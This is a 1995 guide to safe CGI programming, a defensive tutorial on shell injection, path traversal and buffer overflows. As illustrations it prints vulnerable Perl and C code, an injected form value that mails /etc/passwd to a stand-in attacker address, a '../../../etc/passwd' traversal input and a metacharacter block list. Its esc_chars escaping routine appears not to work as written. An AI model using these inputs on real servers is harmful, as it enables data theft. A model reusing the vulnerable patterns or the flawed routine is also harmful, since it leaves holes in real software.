Safe CGI Programming                          Last updated: 1995-09-03
----------------------------------------------------------------------

Recent exposure of security holes in several widely used CGI packages
indicates that the existing documents on CGI security have not taken
hold in the public consciousness.  These scripts are being redistributed
to people that have no programming experience and no way to determine
whether they are opening up their servers for attack.  This causes
considerable frustration for all involved.

This document is intended for the beginning or intermediate
CGI programmer.  It is by no means a comprehensive analysis of
the security risks -- its purpose is to help people avoid the
most common errors.  This document and other CGI security resources
are available at

<URL:http://www.primus.com/staff/paulp/cgi-security/>

Please send comments on this document to Paul Phillips <paulp@cerf.net>

Q: "Why should I care? The server runs as nobody, right? That means
you can't do anything dangerous, even if you break a CGI script."

A: Wrong.  Some of the actions that can be taken in various 
circumstances are:

 1) Mailing the password file to the attacker (unless shadowed)
 2) Mailing a map of the filesystem to the attacker
 3) Mailing system information from /etc to the attacker
 4) Starting a login server on a high port and telneting in
 5) Many denial of service attacks: massive filesytem finds,
 for example, or other resource consuming commands
 6) Erasing and/or altering the server's log files

Another problem is that some sites are running their webservers
as root.  I CANNOT EMPHASIZE ENOUGH HOW BAD THIS IS.  You are shooting
yourself in the foot.  Whatever problem inspired you to do this, you
must solve it in some other manner, or you *will* be compromised in
the future.

There has been some confusion as to what it means to "run your 
webserver as root." It is fine to *start* the webserver as root.
This is necessary to bind to port 80 on Unix systems.  However,
the webserver should then give away its privileges with a call
to setuid.  The webserver's configuration file should allow you
to specify what user it should run as; the default is normally
"nobody", a generic unprivileged account.  Remember that it is
irrelevant which account owns the binary, and the program should 
not have the setuid bit set.

There is a good argument that servers should not actually run as
"nobody", but rather as a specific UID and GID dedicated to the 
webserver, such as "www".  This prevents other programs that run
as "nobody" from interfering with server-owned files.

There is a program called "cgiwrap" <URL:http://www.umr.edu/~cgiwrap>
that runs CGI scripts under the UID of the person that owns them.  While
cgiwrap successfully overcomes some problems with CGI scripts, it also
exacerbates the effect of security holes.  If an attacker can execute
commands under the user UID, rm -rf ~ is only a few characters long,
and the user will lose everything.


Q: "Now I'm scared, maybe my code is buggy.  Can you show me some
examples of security holes?"

A: Now you're talking.  The entire philosophy can be summed up as
"Never trust input data." Most security holes are exploited by 
sending data to the script that the author of the script did not
anticipate.  Let's look at some examples.

Foo wants people to be able to send him email via the web.  She
has several different email addresses, so she encodes an element
specifying which one so she can easily change it later without 
having to change the script.  (She needs her sysadmin's permission
to install or change CGI scripts -- what a hassle!)

<INPUT TYPE="hidden" NAME="FooAddress" VALUE="foo@bar.baz.com">

Now she writes a script called "email-foo", and cajoles the sysadmin
into installing it.  A few weeks later, Foo's sysadmin calls her back: 
crackers have broken into the machine via Foo's script! Where did 
Foo go wrong?

Let's see Foo's mistake in three different languages.  Foo has
placed the data to be emailed in a tempfile and the FooAddress 
passed by the form into a variable.  

Perl:

    system("/usr/lib/sendmail -t $foo_address < $input_file");

C: 

    sprintf(buffer, "/usr/lib/sendmail -t %s < %s", foo_address, input_file);
    system(buffer);

C++:
    
    system("/usr/lib/sendmail -t " + FooAddress + " < " + InputFile);

In all three cases, system is forking a shell.  Foo is unwisely 
assuming that people will only call this script from *her* form, so
the email address will always be one of hers.  But the cracker copied
the form to his own machine, and edited it so it looked like this:

<INPUT TYPE="hidden" NAME="FooAddress"
VALUE="foo@bar.baz.com;mail cracker@bad.com </etc/passwd">

Then he submitted it to Foo's machine, and the rest is history,
along with the machine.


Q: "I never use system.  I guess my scripts are all safe then!"

A: System is not the only command that forks a shell.  In Perl, 
you can invoke a shell by opening to a pipe, using backticks, or 
calling exec (in some cases.)

 * Opening to a pipe: open(OUT, "|program $args");
 * Backticks: `program $args`;
 * Exec: exec("program $args");

You can also get in trouble in Perl with the eval statement or
regular expression modifier /e (which calls eval.) That's beyond
the scope of this document, but be careful.

In C/C++, the popen(3) call also starts a shell.

 * popen("program", "w");


Q: "What's the right way to do it?"

A: Generally there are two answers: use the data only where it can't
hurt you, or check it to make sure it is safe.  

*1* Avoid the shell.

  open(MAIL, "|/usr/lib/sendmail -t");
  print MAIL "To: $recipient\n";

Now the untrusted data is no longer being passed to the shell.  However,
it is being passed unchecked to sendmail.  In some sense you are trading
the shell problems for those of the program you are running externally,
so be sure that it cannot be tricked with the untrusted data!  For example
if you use /usr/ucb/mail rather than /usr/lib/sendmail, ~-escapes can be
used (on some versions) to execute commands.  Be wary.

You can use the perl system() and exec() calls without invoking a shell
by supplying more than one argument:

  system('/usr/games/fortune', '-o');

You can also use open() to achieve an effect similar to popen, but
without invoking the shell, by performing

  open(FH, '|-') || exec("program", $arg1, $arg2);

*2* Avoid insecure data.

  unless($recipient =~ /^[\w@\.\-]+$/) {
    # Print out some HTML here indicating failure
    exit(1);
  }

This time we're making sure the data is safe for passing to the
shell.  The example regexp above specifies what is safe rather than 
what is unsafe.

  if($to =~ tr/;<>*|`&$!#()[]{}:'"//) {
    # Print out some HTML here indicating failure
    exit(1);
  }

Or, to escape metacharacters rather than just detecting them, 
a subroutine like this could be used:

  sub esc_chars {
  # will change, for example, a!!a to a\!\!a
     @_ =~ s/([;<>\*\|`&\$!#\(\)\[\]\{\}:'"])/\\$1/g;
     return @_;
  }

These regexps specify what is unsafe.  I believe them to be a complete
list of potentially dangerous metacharacters, but I have no authoritative
source to check.  The difference between the latter two regexps and the
first is the difference between the two security policies "that which is 
not expressly permitted is forbidden" and "that which is not expressly 
forbidden is permitted." All security professionals will tell you that the 
former policy is safer.

For maximum security, use both *1* and *2* where possible.

USE PERL TAINT CHECKS: Perl can be very helpful with these problems.
Invoke it with perl -T to force taint checks; to learn about taint
checks, see the perl man page.  (The -T option exists only under Perl5.)


Q: Can I trust user supplied data if there is no shell involved?

A: No.  There are other issues as well.  Consider this perl code fragment:

  open(MANPAGE, "/usr/man/man1/$filename.1");

This is intended to allow HTML access to man pages.  However, what if the
user supplied filename is

  ../../../etc/passwd

Anytime you are dealing with pathnamess, be sure to check for 
the .. component.


Q: "What else?"

A: In C and C++, improperly allocated memory is vulnerable to 
buffer overruns.  Perl dynamically extends its data structures to 
prevent this.  Imagine code like this:

int foo() {
    char buffer[10];

    strcpy(buffer, get_form_var("feh"));
    /* etc */
}

When writing this code, the author certainly expected the value of
the feh variable to be less than 10 characters.  Unfortunately for
him, he didn't make sure, and it turned out to be much longer.  This
means that user data is overwriting the program stack, which in some
circumstances can be used to invoke commands.

This is very difficult to exploit and you probably will not encounter 
it.  Still, it's worth mentioning; a very similar hole was found in
NCSA httpd 1.3 earlier in 1995.  It is poor programming practice not to
check such things anyway.

Along the same lines, under no circumstances should the C gets() 
function be used.  It's inherently insecure, as there is no way 
to specify how large the input buffer is.  Use fgets() on the stdin
stream instead.

Q: "My WWW server doesn't run on a unix platform.  Only unix has all
these nasty security holes."

A: This may or may not be true.  The author of this document has limited
experience with servers on other platforms, but he is more than a little
skeptical that security concerns do not exist.  At the very least, the
gets() and stack-overflow issues are present on Windows and MacOS as well.
Specific examples of other CGI dangers on other platforms are welcomed.

*Appendix*

Contributions to this document welcomed at <paulp@cerf.net>.

Thanks to those that have contributed to this document:

John Halperin <JXH@SLAC.Stanford.EDU>
Maurice L. Marvin <maurice@cs.pdx.edu>
Dave Andersen <dga - at - pobox dot com>
Zygo Blaxell <zblaxell@ezmail.com>
Joe Sparrow <JSPARROW@UVVM.UVIC.CA>